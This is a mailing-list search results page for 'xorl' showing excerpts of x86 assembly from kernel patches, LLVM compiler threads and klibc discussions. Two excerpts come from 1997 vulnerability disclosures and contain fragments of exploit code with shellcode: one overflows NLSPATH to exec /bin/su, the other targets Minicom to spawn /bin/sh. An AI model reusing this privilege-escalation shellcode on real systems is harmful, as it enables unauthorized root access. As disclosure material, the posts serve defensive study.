Displaying 20 results from an estimated 278 matches for "xorl".
2017 Oct 20
1
[PATCH v1 01/27] x86/crypto: Adapt assembly for PIE support
...ENDPROC(FUNC);
>>
>> +#define round_mov(tab_off, reg_i, reg_o) \
>> + leaq tab_off(%rip), RBASE; \
>> + movl (RBASE,reg_i,4), reg_o;
>> +
>> +#define round_xor(tab_off, reg_i, reg_o) \
>> + leaq tab_off(%rip), RBASE; \
>> + xorl (RBASE,reg_i,4), reg_o;
>> +
>> #define round(TAB,OFFSET,r1,r2,r3,r4,r5,r6,r7,r8,ra,rb,rc,rd) \
>> movzbl r2 ## H,r5 ## E; \
>> movzbl r2 ## L,r6 ## E; \
>> - movl TAB+1024(,r5,4),r5 ## E;\
>> + round_mov(TAB+1024, r5, r...
2017 Oct 20
1
[PATCH v1 01/27] x86/crypto: Adapt assembly for PIE support
...ENDPROC(FUNC);
>>
>> +#define round_mov(tab_off, reg_i, reg_o) \
>> + leaq tab_off(%rip), RBASE; \
>> + movl (RBASE,reg_i,4), reg_o;
>> +
>> +#define round_xor(tab_off, reg_i, reg_o) \
>> + leaq tab_off(%rip), RBASE; \
>> + xorl (RBASE,reg_i,4), reg_o;
>> +
>> #define round(TAB,OFFSET,r1,r2,r3,r4,r5,r6,r7,r8,ra,rb,rc,rd) \
>> movzbl r2 ## H,r5 ## E; \
>> movzbl r2 ## L,r6 ## E; \
>> - movl TAB+1024(,r5,4),r5 ## E;\
>> + round_mov(TAB+1024, r5, r...
2017 Oct 20
0
[PATCH v1 01/27] x86/crypto: Adapt assembly for PIE support
...12(r9); \
> + popq RBASE; \
> ret; \
> ENDPROC(FUNC);
>
> +#define round_mov(tab_off, reg_i, reg_o) \
> + leaq tab_off(%rip), RBASE; \
> + movl (RBASE,reg_i,4), reg_o;
> +
> +#define round_xor(tab_off, reg_i, reg_o) \
> + leaq tab_off(%rip), RBASE; \
> + xorl (RBASE,reg_i,4), reg_o;
> +
> #define round(TAB,OFFSET,r1,r2,r3,r4,r5,r6,r7,r8,ra,rb,rc,rd) \
> movzbl r2 ## H,r5 ## E; \
> movzbl r2 ## L,r6 ## E; \
> - movl TAB+1024(,r5,4),r5 ## E;\
> + round_mov(TAB+1024, r5, r5 ## E)\
> movw r4 ## X,r2 ## X; \
> - movl TAB(,r6,4)...
2014 Jan 18
2
[LLVMdev] Scheduling quirks
...owing result:
===>
.file "test.cpp"
.text
.globl _Z13test_registeri
.align 16, 0x90
.type _Z13test_registeri, at function
_Z13test_registeri: # @_Z13test_registeri
.cfi_startproc
# BB#0: # %entry
movl %edi, %eax
sarl $2, %eax
xorl %edi, %eax
movl %eax, %ecx
sarl $3, %ecx
xorl %eax, %ecx
movl %ecx, %edx
sarl $4, %edx
xorl %ecx, %edx
movl %edx, %eax
sarl $5, %eax
xorl %edx, %eax
retq
.Ltmp0:
.size _Z13test_registeri, .Ltmp0-_Z13test_registeri
.cfi_endproc
.globl _Z14test_scheduleri
.align 16, 0x90
.type _Z14tes...
2019 Aug 15
2
Slow XCHG in arch/i386/libgcc/__ashrdi3.S and arch/i386/libgcc/__lshrdi3.S
...oth
https://git.kernel.org/pub/scm/libs/klibc/klibc.git/plain/usr/klibc/arch/i386/libgcc/__ashldi3.S
and
https://git.kernel.org/pub/scm/libs/klibc/klibc.git/plain/usr/klibc/arch/i386/libgcc/__lshrdi3.S
use the following code sequences for shift counts greater 31:
1: 1:
xorl %edx,%edx shrl %cl,%edx
shl %cl,%eax xorl %eax,%eax
^
xchgl %edx,%eax xchgl %edx,%eax
ret ret
At least and especially on Intel processors XCHG was and
still is a rather slow instruction and should be avoided.
Use...
2018 Aug 06
4
[Release-testers] [7.0.0 Release] rc1 has been tagged
On Sun, Aug 5, 2018 at 5:49 PM, Dimitry Andric <dimitry at andric.com> wrote:
> On 3 Aug 2018, at 13:37, Hans Wennborg via Release-testers <release-testers at lists.llvm.org> wrote:
>>
>> 7.0.0-rc1 was just tagged (from the branch at r338847).
>>
>> It's early in the release process, but I'd like to find out what the
>> status is of the branch
2017 Oct 11
1
[PATCH v1 01/27] x86/crypto: Adapt assembly for PIE support
...## E,4(r9); \
movl r7 ## E,8(r9); \
movl r8 ## E,12(r9); \
+ popq RBASE; \
ret; \
ENDPROC(FUNC);
+#define round_mov(tab_off, reg_i, reg_o) \
+ leaq tab_off(%rip), RBASE; \
+ movl (RBASE,reg_i,4), reg_o;
+
+#define round_xor(tab_off, reg_i, reg_o) \
+ leaq tab_off(%rip), RBASE; \
+ xorl (RBASE,reg_i,4), reg_o;
+
#define round(TAB,OFFSET,r1,r2,r3,r4,r5,r6,r7,r8,ra,rb,rc,rd) \
movzbl r2 ## H,r5 ## E; \
movzbl r2 ## L,r6 ## E; \
- movl TAB+1024(,r5,4),r5 ## E;\
+ round_mov(TAB+1024, r5, r5 ## E)\
movw r4 ## X,r2 ## X; \
- movl TAB(,r6,4),r6 ## E; \
+ round_mov(TAB, r6, r6 ## E...
2019 Aug 20
1
Slow XCHG in arch/i386/libgcc/__ashrdi3.S and arch/i386/libgcc/__lshrdi3.S
...t/plain/usr/klibc/arch/i386/libgcc/__ashldi3.S
>> and
>> https://git.kernel.org/pub/scm/libs/klibc/klibc.git/plain/usr/klibc/arch/i386/libgcc/__lshrdi3.S
>> use the following code sequences for shift counts greater 31:
>>
>> 1: 1:
>> xorl %edx,%edx shrl %cl,%edx
>> shl %cl,%eax xorl %eax,%eax
>> ^
>> xchgl %edx,%eax xchgl %edx,%eax
>> ret ret
>>
>> At least and especially on Intel processors XCHG was and
>>...
2015 Sep 01
2
[RFC] New pass: LoopExitValues
...*Src, unsigned int Val) {
for (int Outer = 0; Outer < Size; ++Outer)
for (int Inner = 0; Inner < Size; ++Inner)
Dst[Outer * Size + Inner] = Src[Outer * Size + Inner] * Val;
}
With LoopExitValues
-------------------------------
matrix_mul:
testl %edi, %edi
je .LBB0_5
xorl %r9d, %r9d
xorl %r8d, %r8d
.LBB0_2:
xorl %r11d, %r11d
.LBB0_3:
movl %r9d, %r10d
movl (%rdx,%r10,4), %eax
imull %ecx, %eax
movl %eax, (%rsi,%r10,4)
incl %r11d
incl %r9d
cmpl %r11d, %edi
jne .LBB0_3
incl %r8d
cmpl %edi, %r8d
jne .LBB0_2
.LBB0_5:...
2015 Aug 31
2
[RFC] New pass: LoopExitValues
Hello LLVM,
This is a proposal for a new pass that improves performance and code
size in some nested loop situations. The pass is target independent.
>From the description in the file header:
This optimization finds loop exit values reevaluated after the loop
execution and replaces them by the corresponding exit values if they
are available. Such sequences can arise after the
1997 Feb 14
0
Linux NLSPATH buffer overflow (fwd)
...12);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("NLSPATH", buffer, 1);
execl("/bin/su", "/bin/su", NULL);
}
--- nlspath.c ---
And the shellcode separately:
--- shellcode.s ---
.text
.globl shellcode
shellcode:
xorl %eax,%eax
movb $0x31,%al
int $0x80
xchgl %eax,%ebx
xorl %eax,%eax
movb $0x17,%al
int $0x80
.byte 0x68
popl %ecx
popl %eax
jmp *%ecx
call *%esp
xorl %eax,%eax
cltd
movl %ecx,%edi
movb $''/''-1,%al
incl %eax
scasb %es:(%edi),%al
jne -3
movl %edi,(%ecx)
movl %edx,4(%ecx)
movl %edi,%ebx...
2016 Nov 17
4
RFC: Insertion of nops for performance stability
...4 28 movq 40(%rsp), %rax
5: 8b 00 movl (%rax), %eax
7: 01 c8 addl %ecx, %eax
9: 44 39 c0 cmpl %r8d, %eax
c: 75 0f jne 15 <foo+0x1D>
e: ff 05 00 00 00 00 incl (%rip)
14: ff 05 00 00 00 00 incl (%rip)
1a: 31 c0 xorl %eax, %eax
1c: c3 retq
1d: 44 39 c9 cmpl %r9d, %ecx
20: 74 ec je -20 <foo+0xE>
22: 48 8b 44 24 30 movq 48(%rsp), %rax
27: 2b 08 subl (%rax), %ecx
29: 39 d1 cmpl %edx, %ecx
2b: 7f e1 jg -31 <foo+0xE>
2d:...
2019 Aug 19
0
Slow XCHG in arch/i386/libgcc/__ashrdi3.S and arch/i386/libgcc/__lshrdi3.S
.../scm/libs/klibc/klibc.git/plain/usr/klibc/arch/i386/libgcc/__ashldi3.S
> and
> https://git.kernel.org/pub/scm/libs/klibc/klibc.git/plain/usr/klibc/arch/i386/libgcc/__lshrdi3.S
> use the following code sequences for shift counts greater 31:
>
> 1: 1:
> xorl %edx,%edx shrl %cl,%edx
> shl %cl,%eax xorl %eax,%eax
> ^
> xchgl %edx,%eax xchgl %edx,%eax
> ret ret
>
> At least and especially on Intel processors XCHG was and
> still is a rather slow inst...
2012 Mar 28
2
[LLVMdev] Suboptimal code due to excessive spilling
...mp14:
.cfi_def_cfa_offset 12
pushl %esi
.Ltmp15:
.cfi_def_cfa_offset 16
subl $88, %esp
.Ltmp16:
.cfi_def_cfa_offset 104
.Ltmp17:
.cfi_offset %esi, -16
.Ltmp18:
.cfi_offset %edi, -12
.Ltmp19:
.cfi_offset %ebx, -8
pxor %xmm0, %xmm0
movl 112(%esp), %eax
testl %eax, %eax
je .LBB1_3
# BB#1:
xorl %ebx, %ebx
movl 108(%esp), %ecx
movl 104(%esp), %edx
xorl %esi, %esi
.align 16, 0x90
.LBB1_2: # %.lr.ph.i
# =>This Inner Loop Header: Depth=1
movsd (%edx,%ebx,8), %xmm2
addsd .LCPI1_0, %xmm2
movsd 16(%edx,%ebx,8), %xmm...
2012 Apr 05
0
[LLVMdev] Suboptimal code due to excessive spilling
...mp14:
.cfi_def_cfa_offset 12
pushl %esi
.Ltmp15:
.cfi_def_cfa_offset 16
subl $88, %esp
.Ltmp16:
.cfi_def_cfa_offset 104
.Ltmp17:
.cfi_offset %esi, -16
.Ltmp18:
.cfi_offset %edi, -12
.Ltmp19:
.cfi_offset %ebx, -8
pxor %xmm0, %xmm0
movl 112(%esp), %eax
testl %eax, %eax
je .LBB1_3
# BB#1:
xorl %ebx, %ebx
movl 108(%esp), %ecx
movl 104(%esp), %edx
xorl %esi, %esi
.align 16, 0x90
.LBB1_2: # %.lr.ph.i
# =>This Inner Loop Header: Depth=1
movsd (%edx,%ebx,8), %xmm2
addsd .LCPI1_0, %xmm2
movsd 16(%edx,%ebx,8), %xmm...
1997 Feb 09
0
Minicom 1.75 Vulnerability
...h>
#include <string.h>
#include <stdarg.h>
#define NOP 0x90
const char usage[] = "usage: %s stack-offset buffer-size argv0 argv1 ...\n";
extern code();
void dummy( void )
{
extern lbl();
/* do "exec( "/bin/sh" ); exit(0)" */
__asm__( "
code: xorl %edx, %edx
pushl %edx
jmp lbl
start2: movl %esp, %ecx
popl %ebx
movb %edx, 0x7(%ebx)
xorl %eax, %eax
movb $0xB, %eax
int $0x80
xorl %ebx, %ebx
xorl %eax, %eax
inc %eax
int $0x80
lbl: call start2
.string \"/bin/sh\"
");
}
void Fatal( int rv, const char *fmt, ... )
{
va...
2009 Jan 15
2
[LLVMdev] Testcase for OS kernel
...struct a;
struct a_struct *pa;
__asm__ __volatile__(
"1: movl 0(%2),%%eax\n"
"2: movl 4(%2),%%edx\n"
"3:\n" ".section .fixup,\"ax\"\n"
"4: movl %3,%0\n"
" xorl %%eax,%%eax\n"
" xorl %%edx,%%edx\n"
" jmp 3b\n" ".previous\n"
".section __ex_table,\"a\"\n"
" .align 4\n"
" .long 1b,4b\n"
" .long...
2011 Dec 14
2
[LLVMdev] Failure to optimize ? operator
...he given function.
So always T(f1) <= T(f2).
I would call this a missed optimization opportunity. I think it
warrants a bug report.
If I do the same experiment with gcc I get identical code for the two functions:
==============================================
_f1: pushl %ebp xorl %eax, %eax movl
%esp, %ebp movl 8(%ebp), %edx testl %edx, %edx
jle L5 popl %ebp ret .p2align 4,,7L5:
movl %edx, %ecx imull %edx, %ecx popl %ebp
leal 3(%ecx,%ecx,4), %eax imull %edx, %eax
leal 1(...
2007 Oct 19
2
[LLVMdev] llvm_fcmp_ord and llvm_fcmp_uno and assembly code generation
...turn X != X || Y != Y; }
int x(double X, double Y)
{
return llvm_fcmp_uno(X,Y);
}
int xx(double X, double Y)
{
return isunordered(X, Y);
}
$ gcc -std=c99 -O3 -S x.c -o x.gcc.s
$ llvm-gcc -std=c99 -O3 -S x.c -o x.llvm.s
x.gcc.s:
x:
.LFB7:
movl $1, %eax
ucomisd %xmm0, %xmm0
jne .L5
jp .L5
xorl %eax, %eax
ucomisd %xmm1, %xmm1
setp %al
.L5:
rep ; ret
.LFE7:
.size x, .-x
.p2align 4,,15
.globl xx
.type xx, @function
xx:
.LFB8:
xorl %eax, %eax
ucomisd %xmm1, %xmm0
setp %al
ret
x.llvm.s:
x:
pxor %xmm2, %xmm2
ucomisd %xmm2, %xmm0
setp %al
ucomisd %xmm2, %xmm1
setp %cl
orb %al,...
2011 Feb 26
2
[LLVMdev] TableGen syntax for matching a constant load
...e the performance impact of doing this. You
> are creating a false dependency on the last instruction to write %eax,
> and the CPU won't be able to execute the following instructions in
> parallel.
I am primarily interested in size here, not speed.
> You may want to consider using xorl+decl instead. It is also three
> bytes, and there are no false dependencies. The xor idiom is recognized
> by processors as old as Pentium 4 as having no dependencies.
Any examples of how to create more than one instructions for a given
pattern? There are some other cases I could use this fo...